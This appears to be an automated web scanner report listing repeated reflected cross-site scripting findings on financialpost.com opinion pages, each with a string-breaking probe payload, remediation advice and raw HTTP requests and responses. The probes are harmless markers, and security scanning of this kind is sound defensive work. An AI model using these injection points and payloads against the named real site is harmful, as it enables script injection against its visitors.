<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/fpo.com/opinion/columnists/retired-forgotten/3996666b60e8';c423016c9ce/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=opinion;kw=columnists;kw=retired-forgotten;kw=3996666b60e8';c423016c9ce;kw=npo;kw=fpo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord= ...[SNIP]...
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 85984'%3b9b5aa3d4cb2 was submitted in the REST URL parameter 5. This input was echoed as 85984';9b5aa3d4cb2 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/Retired+forgotten/3996666/85984'%3b9b5aa3d4cb2 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:14:43 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:14:43 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37190
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a9914'%3b305cc1577f was submitted in the REST URL parameter 1. This input was echoed as a9914';305cc1577f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opiniona9914'%3b305cc1577f/columnists/barry-critchley.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:30 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:30 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44289
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eacd7'%3bd88cefa4959 was submitted in the REST URL parameter 2. This input was echoed as eacd7';d88cefa4959 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnistseacd7'%3bd88cefa4959/barry-critchley.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:34 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:34 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37612
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29f40'%3b40381cfea5e was submitted in the REST URL parameter 3. This input was echoed as 29f40';40381cfea5e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/29f40'%3b40381cfea5e HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:42 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:42 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43401
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4697c'%3b898f841844e was submitted in the REST URL parameter 1. This input was echoed as 4697c';898f841844e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion4697c'%3b898f841844e/columnists/diane-francis.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:25 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d524b'%3be3824be34be was submitted in the REST URL parameter 2. This input was echoed as d524b';e3824be34be in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnistsd524b'%3be3824be34be/diane-francis.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:29 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43436
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c15cd'%3b24a7cbbec0f was submitted in the REST URL parameter 3. This input was echoed as c15cd';24a7cbbec0f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/c15cd'%3b24a7cbbec0f HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:35 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44221
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 204b9'%3bda5ddd2e310 was submitted in the REST URL parameter 1. This input was echoed as 204b9';da5ddd2e310 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion204b9'%3bda5ddd2e310/columnists/garry-marr.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:13:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:13:19 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43441
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6548'%3b3159e915d61 was submitted in the REST URL parameter 2. This input was echoed as f6548';3159e915d61 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnistsf6548'%3b3159e915d61/garry-marr.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:13:25 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:13:25 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37562
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc04b'%3bdce0ac574b1 was submitted in the REST URL parameter 3. This input was echoed as cc04b';dce0ac574b1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/cc04b'%3bdce0ac574b1 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:13:35 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:13:35 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43402
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 88d2f'%3b0c9133db820 was submitted in the REST URL parameter 1. This input was echoed as 88d2f';0c9133db820 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion88d2f'%3b0c9133db820/columnists/jamie-golombek.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:44 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37637
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4ed13'%3b43d2ce6bccf was submitted in the REST URL parameter 2. This input was echoed as 4ed13';43d2ce6bccf in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists4ed13'%3b43d2ce6bccf/jamie-golombek.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:54 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37601
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b393c'%3b95d66bbad15 was submitted in the REST URL parameter 3. This input was echoed as b393c';95d66bbad15 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/b393c'%3b95d66bbad15 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:13:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:13:02 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44222
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a8854'%3b3c5e10ffaf8 was submitted in the REST URL parameter 1. This input was echoed as a8854';3c5e10ffaf8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opiniona8854'%3b3c5e10ffaf8/columnists/jonathan-chevreau.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:32 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:32 GMT Connection: close Connection: Transfer-Encoding Content-Length: 43512
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ca10'%3bd81b1ae580f was submitted in the REST URL parameter 2. This input was echoed as 1ca10';d81b1ae580f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists1ca10'%3bd81b1ae580f/jonathan-chevreau.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:37 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:37 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37632
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1e72'%3bc945c59c0e9 was submitted in the REST URL parameter 3. This input was echoed as f1e72';c945c59c0e9 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/f1e72'%3bc945c59c0e9 HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:44 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:44 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37558
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8d26'%3b3b9f28c8209 was submitted in the REST URL parameter 1. This input was echoed as c8d26';3b9f28c8209 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinionc8d26'%3b3b9f28c8209/columnists/peter-foster.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:12:55 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:12:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 44282
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71174'%3b881fe5fc1ca was submitted in the REST URL parameter 2. This input was echoed as 71174';881fe5fc1ca in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists71174'%3b881fe5fc1ca/peter-foster.html HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:13:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:13:04 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37582
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7ce7'%3b6e16cbc7aac was submitted in the REST URL parameter 3. This input was echoed as f7ce7';6e16cbc7aac in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /opinion/columnists/f7ce7'%3b6e16cbc7aac HTTP/1.1 Host: www.financialpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_depth=1; ASP.NET_SessionId=gawx4vai53yfaryj50thxu55;
Response (redirected)
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:13:16 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:13:16 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37558
